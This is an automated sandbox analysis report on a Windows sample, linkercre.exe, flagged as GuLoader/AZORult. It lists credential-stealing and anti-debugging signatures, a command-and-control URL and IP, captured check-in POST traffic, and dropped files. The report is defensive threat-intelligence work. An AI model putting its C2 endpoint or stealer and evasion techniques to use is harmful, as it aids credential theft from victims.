
Analysis Report linkercre.exe

Overview

General Information

Sample Name: linkercre.exe
Analysis ID: 289433
MD5: acc9728c11b4de0ed1bd7c45bafad61f
SHA1: f192b7cec15b1b2963e022bd72610676c9b14fc4
SHA256: 0ff22289861f8a6429298e1508c0d1557c4da9483ac7c6531d7e58bbd8a030f4


Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)


Startup

  • System is w10x64
  • linkercre.exe (PID: 4320 cmdline: 'C:\Users\user\Desktop\linkercre.exe' MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
    • linkercre.exe (PID: 5812 cmdline: 'C:\Users\user\Desktop\linkercre.exe' MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: linkercre.exe PID: 4320 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: linkercre.exe PID: 4320 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Signature Overview


      AV Detection:

Antivirus / Scanner detection for submitted sample
Source: linkercre.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: officestore.co.id | Virustotal: Detection: 8%
Source: http://officestore.co.id/linkzer/PL341/index.php | Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: linkercre.exe | Virustotal: Detection: 39%
Source: linkercre.exe | ReversingLabs: Detection: 58%
Source: 0.0.linkercre.exe.400000.0.unpack | Avira: Label: TR/AD.VBCryptor.nncrr
Source: 2.0.linkercre.exe.400000.0.unpack | Avira: Label: TR/AD.VBCryptor.nncrr

      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.3:49691 -> 103.247.10.55:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.3:49691
Source: Joe Sandbox View | IP Address: 103.247.10.55
Source: Joe Sandbox View | ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: global traffic | HTTP traffic detected:
    POST /linkzer/PL341/index.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: officestore.co.id
    Content-Length: 99
    Cache-Control: no-cache
    Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 60 8b 30 62 ed 47 10 8b 30 62 8b 30 6c e8 26 67 ea 26 66 9c 26 66 9b 45 17 8b 30 64 ea 46 17 8b 31 11 8b 30 62 8b 30 62 8b 30 65 eb 41 70 9d 32 16 eb
    Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410`0bG0b0l&g&f&fE0dF10b0b0eAp2
Source: global traffic | HTTP traffic detected:
    POST /linkzer/PL341/index.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: officestore.co.id
    Content-Length: 49565
    Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected:
    POST /linkzer/PL341/index.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: officestore.co.id
    Content-Length: 99
    Cache-Control: no-cache
    Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 60 8b 30 62 ed 47 10 8b 30 62 8b 30 6c e8 26 67 ea 26 66 9c 26 66 9b 45 17 8b 30 64 ea 46 17 8b 31 11 8b 30 62 8b 30 62 8b 30 65 eb 41 70 9d 32 16 eb
    Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410`0bG0b0l&g&f&fE0dF10b0b0eAp2
Source: nss3.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.2.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nss3.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nss3.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.2.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: nss3.dll.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: nss3.dll.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: nss3.dll.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.2.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: nss3.dll.2.dr | String found in binary or memory: http://www.mozilla.com0
Source: nss3.dll.2.dr | String found in binary or memory: https://www.digicert.com/CPS0

      System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43AD6 NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,NtMapViewOfSection,0_2_02B43AD6
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4021A EnumWindows,NtSetInformationThread,TerminateProcess,0_2_02B4021A
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43182 NtWriteVirtualMemory,LoadLibraryA,0_2_02B43182
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43773 NtProtectVirtualMemory,0_2_02B43773
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B414FE NtWriteVirtualMemory,0_2_02B414FE
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43ADE NtMapViewOfSection,0_2_02B43ADE
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4167B NtWriteVirtualMemory,0_2_02B4167B
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B40C6F NtWriteVirtualMemory,0_2_02B40C6F
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4026A NtSetInformationThread,TerminateProcess,0_2_02B4026A
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4024A NtSetInformationThread,TerminateProcess,0_2_02B4024A
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43585 NtWriteVirtualMemory,0_2_02B43585
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B417F7 NtWriteVirtualMemory,0_2_02B417F7
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43BED NtMapViewOfSection,0_2_02B43BED
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B41B3E NtWriteVirtualMemory,CreateFileA,0_2_02B41B3E
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43B29 NtMapViewOfSection,0_2_02B43B29
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B41914 NtWriteVirtualMemory,0_2_02B41914
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43B7A NtMapViewOfSection,0_2_02B43B7A
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4115E NtWriteVirtualMemory,0_2_02B4115E
Source: linkercre.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-debug-l1-1-0.dll.2.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.dr | Static PE information: No import functions for PE file found
Source: linkercre.exe, 00000000.00000002.371018547.0000000002A20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs linkercre.exe
Source: linkercre.exe, 00000000.00000000.355453187.0000000000409000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
Source: linkercre.exe, 00000002.00000000.369609142.0000000000409000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
Source: linkercre.exe | Binary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
Source: C:\Users\user\Desktop\linkercre.exe | Section loaded: crtdll.dll
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
Source: C:\Users\user\Desktop\linkercre.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-57CDE79F-25FB1DEB-770EB1CE
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\
Source: linkercre.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\linkercre.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\linkercre.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\linkercre.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: softokn3.dll.2.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: nss3.dll.2.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.2.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.2.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.2.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.2.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.2.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.2.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.2.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.2.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.2.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: nss3.dll.2.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: nss3.dll.2.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.2.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: nss3.dll.2.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.2.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: linkercre.exe | Virustotal: Detection: 39%
Source: linkercre.exe | ReversingLabs: Detection: 58%
Source: unknown | Process created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe'
Source: C:\Users\user\Desktop\linkercre.exe | Process created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe'
Source: C:\Users\user\Desktop\linkercre.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: mozglue.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: nss3.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.2.dr
      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.2.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.2.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.2.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: mozglue.dll.2.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.2.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.2.dr
      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.2.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.2.dr
      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.2.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.2.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.2.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.2.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.2.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.2.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.2.dr

      Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: linkercre.exe PID: 4320, type: MEMORY
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: linkercre.exe PID: 4320, type: MEMORY
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00403057 push edx; ret 0_2_0040320E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00402A72 push edx; ret 0_2_00402A81
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_0040510D push ebp; retf 0_2_0040510E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00405124 push ebp; retf 0_2_00405126
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00405334 push ebp; retf 0_2_00405336
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00401C3A push eax; ret 0_2_00401C3B
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004034D1 push 647C8AE6h; iretd 0_2_004034D6
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004051D2 push ebp; retf 0_2_004051EE
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004050D8 push ebp; retf 0_2_004050DA
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004051EF push ebp; retf 0_2_004051F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4003A push edi; ret 0_2_02B40059
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06AA16 pushfd ; iretd 2_3_1E06A9D2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065619 push 52A9FB8Eh; iretd 2_3_1E06561E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06725A push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E067E6B pushfd ; retf 2_3_1E067E8E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0676A1 pushfd ; retf 2_3_1E0676A2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0672B8 push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0656C3 push cs; iretd 2_3_1E0656CD
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068B12 push FFFFFFC3h; ret 2_3_1E068B3A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065339 push cs; iretd 2_3_1E065342
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E067341 push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066B58 pushfd ; iretd 2_3_1E066B62
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068F82 pushfd ; retf 2_3_1E068F86
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065BCF push ss; iretd 2_3_1E065BEF
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0663F1 push es; iretd 2_3_1E0663FB
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068FFE push ecx; ret 2_3_1E068FFF
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066443 pushfd ; iretd 2_3_1E06644E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066472 push eax; iretd 2_3_1E066479
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065946 pushfd ; iretd 2_3_1E06594A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06655F pushfd ; iretd 2_3_1E06656E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06A9C3 pushfd ; iretd 2_3_1E06A9D2
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\softokn3.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\mozglue.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\freebl3.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\msvcp140.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-1.dll
